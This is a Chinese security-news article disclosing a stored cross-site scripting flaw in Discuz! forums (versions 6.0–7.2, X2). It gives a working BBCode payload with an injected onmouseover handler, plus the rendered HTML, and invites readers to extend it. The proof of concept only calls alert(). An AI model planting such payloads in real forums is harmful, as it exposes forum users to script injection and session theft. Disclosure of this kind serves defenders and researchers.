Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

6月23日Discuz!多版本爆存储型XSS脚本漏洞 (0day)

来源: 未知 分享至:

2009年一次偶然间测试发现的此XSS漏洞,因为是存储型的,我想大家应该知道它的危害吧。相隔这么多年DZ不断的更新版本,但此漏洞依然存在,今天就发布出来吧!留着也没什么用会长毛的,呵呵。
在此我要感谢一下我的好朋友Jackal在09年的时候一起帮我测试漏洞的。
当时我们一起测试的是DZ6.0-DZ7.2,不知道是不是通杀啊。哈哈!没有一个一个去测试。有条件的去测试一下吧。
详细说明:

发贴进入源码模式,写入如下的exp
 

  1. [email][url][img]http://www.linuxso.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email]


上面代码是以鼠标事件来触发XSS的,剩下的大家可以自行发挥构造!!!

附上XSS完的源码如下:
 

  1. <a href="mailto:"></a><a href="%5C%22http://www.linuxso.com" onmouseover="alert(/DZ-xss-0day/);" \"="" target="\"_blank\""><img src="http://www.linuxso.com%20onmouseover=alert%28/DZ-xss-0day/%29;" onload="thumbImg(this)" alt=""> </a><


我想你们一看就明白了吧!!!
漏洞证明:

本地测试结果:
Discuz! X2


Tags: discuz漏洞 Discuz xss
分享至:
最新图文资讯
1 2 3 4 5 6
相关文章列表:
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史